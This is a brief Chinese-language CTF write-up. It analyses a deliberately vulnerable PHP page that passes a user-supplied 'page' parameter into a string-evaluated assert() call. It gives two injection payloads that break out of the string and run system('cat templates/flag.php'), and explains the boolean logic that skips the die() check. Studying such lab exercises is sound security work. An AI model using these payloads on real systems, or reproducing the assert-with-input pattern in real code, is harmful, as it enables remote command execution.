<?php
    if (isset($_GET['page'])) {
    $page = $_GET['page'];
    } else {
    $page = "home";
    }
    $file = "templates/" . $page . ".php";
    // I heard '..' is dangerous!
    assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); //如果file里存在..就执行or后面的die
    // TODO: Make this look nice
    assert("file_exists('$file')") or die("That file doesn't exist!");
    ?>

    构造payload:
    ?page=’) or system(“cat templates/flag.php”);//

    即$file=templates/‘) or system(“cat templates/flag.php”);//
    assert(“strpos(‘templates/‘) or system(“cat templates/flag.php”);//‘, ‘..’) === false”) or die(“Detected hacking attempt!”);

    蓝色的strpos部分为假,assert执行第一个or后面的system语句,最后//注释掉后面’, ‘..’) === false”)
    因为strpos为假,system为真,假or真为真,所以assert部分为真,那么第二个or后面的die就不会再执行了

    payload2:
    ?$page=’).system(“cat templates/flag.php”);//
    这个.的作用我还没太理解